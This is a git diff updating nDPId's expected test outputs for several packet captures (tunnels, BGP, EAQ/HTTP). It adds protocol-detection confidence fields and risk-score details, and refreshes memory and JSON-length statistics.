+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1543235434019,"flow_last_seen":1543235434019,"flow_idle_time":600000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":1780,"flow_avg_l4_payload_len":445,"midstream":0,"ts_msec":1543235434019,"l3_proto":"ip6","src_ip":"22e0:1685:eda7:38cc:58bd:f3f1:aa3f:22d8","dst_ip":"344a:ba94:152a:ac34::2a","l4_proto":4,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IP_in_IP","breed":"Acceptable","category":"Network"}}
 00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"4in6tunnel.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 4/4
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594945 bytes
-~~ total memory freed........: 4594945 bytes
-~~ total allocations/frees...: 99557/99557
+~~ total memory allocated....: 4679898 bytes
+~~ total memory freed........: 4679898 bytes
+~~ total allocations/frees...: 101147/101147
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
 ~~ json string max len.......: 872 chars
-~~ json string avg len.......: 569 chars
+~~ json string avg len.......: 570 chars
diff --git a/test/results/6in4tunnel.pcap.out b/test/results/6in4tunnel.pcap.out
index 0976f5e30..259427395 100644
--- a/test/results/6in4tunnel.pcap.out
+++ b/test/results/6in4tunnel.pcap.out
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4598512 bytes
-~~ total memory freed........: 4598512 bytes
-~~ total allocations/frees...: 99680/99680
+~~ total memory allocated....: 4683465 bytes
+~~ total memory freed........: 4683465 bytes
+~~ total allocations/frees...: 101270/101270
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 164 chars
 ~~ json string max len.......: 650 chars
diff --git a/test/results/6in6tunnel.pcap.out b/test/results/6in6tunnel.pcap.out
index 58d6c8a4d..9da796f4d 100644
--- a/test/results/6in6tunnel.pcap.out
+++ b/test/results/6in6tunnel.pcap.out
@@ -16,9 +16,9 @@
 ~~ total active/idle flows...: 2/2
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4596087 bytes
-~~ total memory freed........: 4596087 bytes
-~~ total allocations/frees...: 99558/99558
+~~ total memory allocated....: 4680712 bytes
+~~ total memory freed........: 4680712 bytes
+~~ total allocations/frees...: 101148/101148
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 163 chars
 ~~ json string max len.......: 597 chars
diff --git a/test/results/BGP_Cisco_hdlc_slarp.pcap.out b/test/results/BGP_Cisco_hdlc_slarp.pcap.out
index ce9bc21de..56dbf8f69 100644
--- a/test/results/BGP_Cisco_hdlc_slarp.pcap.out
+++ b/test/results/BGP_Cisco_hdlc_slarp.pcap.out
@@ -3,8 +3,8 @@
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1445156939131,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":48,"pkt_l4_len":24,"ts_msec":1445156939131,"pkt":"DwAIAEXAACz4kkAAAQa2VmQQAQJkEAEBR5QAs7zqddEAAAAAYAJAABMAAAACBAW0"}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1445156939145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":48,"pkt_l4_len":24,"ts_msec":1445156939145,"pkt":"DwAIAEXAACyvfwAAAQY\/amQQAQFkEAECALNHlBlZ03+86nXSYBJAACYWAAACBAW0"}
 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1445156939152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":44,"pkt_l4_len":20,"ts_msec":1445156939152,"pkt":"DwAIAEXAACj4k0AAAQa2WWQQAQJkEAEBR5QAs7zqddIZWdOAUBBAAD3TAAA="}
-00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1445156939131,"flow_last_seen":1445156939152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1445156939152,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","ndpi": {"proto":"BGP","breed":"Acceptable","category":"Network"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1445156939131,"flow_last_seen":1445156989230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1445156989230,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","flow_datalink":9,"flow_max_packets":3,"ndpi": {"proto":"BGP","breed":"Acceptable","category":"Network"}}
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1445156939131,"flow_last_seen":1445156939152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1445156939152,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1445156939131,"flow_last_seen":1445156989230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1445156989230,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","flow_datalink":9,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}}
 00168{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 14/14
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4595235 bytes
-~~ total memory freed........: 4595235 bytes
-~~ total allocations/frees...: 99567/99567
+~~ total memory allocated....: 4680188 bytes
+~~ total memory freed........: 4680188 bytes
+~~ total allocations/frees...: 101157/101157
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 173 chars
-~~ json string max len.......: 659 chars
-~~ json string avg len.......: 474 chars
+~~ json string max len.......: 685 chars
+~~ json string avg len.......: 485 chars
diff --git a/test/results/BGP_redist.pcap.out b/test/results/BGP_redist.pcap.out
index 0d9dd0689..3187fdb08 100644
--- a/test/results/BGP_redist.pcap.out
+++ b/test/results/BGP_redist.pcap.out
@@ -3,8 +3,8 @@
 00170{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":104,"thread_id":0,"packet_id":1,"source":"BGP_redist.pcap","alias":"nDPId-test","protocol":34887}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3}
 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":159,"pkt_l4_len":135,"ts_msec":1256636836167,"pkt":"DwAIAEXAAJv\/w0AA\/gZtywICAgIFBQUFALPBGWeqNFC\/WbBkUBg\/x6y+AAD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/AHMCAAAAXEABAQJAAgCABAQAAABWQAUEAAAAZMAQIAACAGQAAARXAAUAAAABAgCAAAAAAAADAIABrBACAQAAgA4hAAGADAAAAAAAAAAAAgICAgB4AAGRAAAAZAAAAGSqAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","ndpi": {"proto":"BGP","breed":"Acceptable","category":"Network"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3,"ndpi": {"proto":"BGP","breed":"Acceptable","category":"Network"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7440000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}}
 00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 2/1
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594858 bytes
-~~ total memory freed........: 4594858 bytes
-~~ total allocations/frees...: 99554/99554
+~~ total memory allocated....: 4679811 bytes
+~~ total memory freed........: 4679811 bytes
+~~ total allocations/frees...: 101144/101144
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
-~~ json string max len.......: 646 chars
-~~ json string avg len.......: 401 chars
+~~ json string max len.......: 672 chars
+~~ json string avg len.......: 412 chars
diff --git a/test/results/EAQ.pcap.out b/test/results/EAQ.pcap.out
index 94ecf1238..44159bfb7 100644
--- a/test/results/EAQ.pcap.out
+++ b/test/results/EAQ.pcap.out
@@ -3,12 +3,12 @@
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432820948562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1432820948562,"pkt":"ABoRAAACABoRAAABCABFAAA8xb9AAEAGRgEKCAABrcJ3MND5AFA4ezYlAAAAAKACOQisdgAAAgQFtAQCCAoABPOaAAAAAAEDAwQ="}
 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1432820948566,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432820948566,"pkt":"ABoRAAACABoRAAABCABFAAAoAAJAABAGO9OtwncwCggAAQBQ0PnHhMnaOHs2JlAS\/\/+vjAAA"}
 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1432820948569,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432820948569,"pkt":"ABoRAAACABoRAAABCABFAAAoxcBAAEAGRhQKCAABrcJ3MND5AFA4ezYmx4TJ21AQOQh2hQAA"}
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948562,"flow_last_seen":1432820948576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1432820948576,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11":"HTTP Suspicious User-Agent"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com","url":"www.google.com\/","code":0,"content_type":"","user_agent":"test"}}
+00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948562,"flow_last_seen":1432820948576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1432820948576,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com","url":"www.google.com\/","code":0,"content_type":"","user_agent":"test"}}
 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820948836,"flow_last_seen":1432820948836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1432820948836,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1432820948836,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1432820948836,"pkt":"ABoRAAACABoRAAABCABFAAA8DwhAAEAG\/NAKCAABrcJ3GJ4TAFBXrfy9AAAAAKACOQj5jgAAAgQFtAQCCAoABPO1AAAAAAEDAwQ="}
 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1432820948837,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432820948837,"pkt":"ABoRAAACABoRAAABCABFAAAoAAZAABAGO+etwncYCggAAQBQnhOoUgNCV638vlAS\/\/\/iigAA"}
 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1432820948844,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1432820948844,"pkt":"ABoRAAACABoRAAABCABFAAAoDwlAAEAG\/OMKCAABrcJ3GJ4TAFBXrfy+qFIDQ1AQOQipgwAA"}
-00803{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948836,"flow_last_seen":1432820948845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432820948845,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11":"HTTP Suspicious User-Agent"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com.br","url":"www.google.com.br\/?gfe_rd=cr&ei=1BxnVcP9OKKk8we50oDAAg","code":0,"content_type":"","user_agent":"test"}}
+00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948836,"flow_last_seen":1432820948845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1432820948845,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com.br","url":"www.google.com.br\/?gfe_rd=cr&ei=1BxnVcP9OKKk8we50oDAAg","code":0,"content_type":"","user_agent":"test"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820949586,"flow_last_seen":1432820949586,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432820949586,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.138.146","src_port":52257,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1432820949586,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432820949586,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR3WwKCAAByLmKkswhF3AAGNX0AAAAAAAADdoAAUsHAACQAA=="}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1432820949685,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432820949685,"pkt":"ABoRAAACABoRAAABCABFAAAsAAxAABARDWHIuYqSCggAARdwzCEAGAX1AAAAAAAADdoAAUsHAABgAA=="}
@@ -76,15 +76,15 @@
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820970111,"flow_last_seen":1432820970111,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432820970111,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.67","src_port":40058,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1432820970111,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432820970111,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR4bIKCAAByMKGQ5x6F3AAGJpnAAAAAAAADdoADrp0AACQAA=="}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1432820971111,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432820971111,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR3WwKCAAByLmKkswhF3AAGNRlAAAAAQAADdsAAUyUAACQAA=="}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949586,"flow_last_seen":1432820971175,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432820971175,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.138.146","src_port":52257,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949586,"flow_last_seen":1432820971175,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432820971175,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.138.146","src_port":52257,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1432820971175,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432820971175,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR6hwKCAAByLl94r76F3AAGJ\/qAAAAAQAADdsAAZrmAACQAA=="}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949685,"flow_last_seen":1432820971265,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432820971265,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.125.226","src_port":48890,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949685,"flow_last_seen":1432820971265,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432820971265,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.125.226","src_port":48890,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
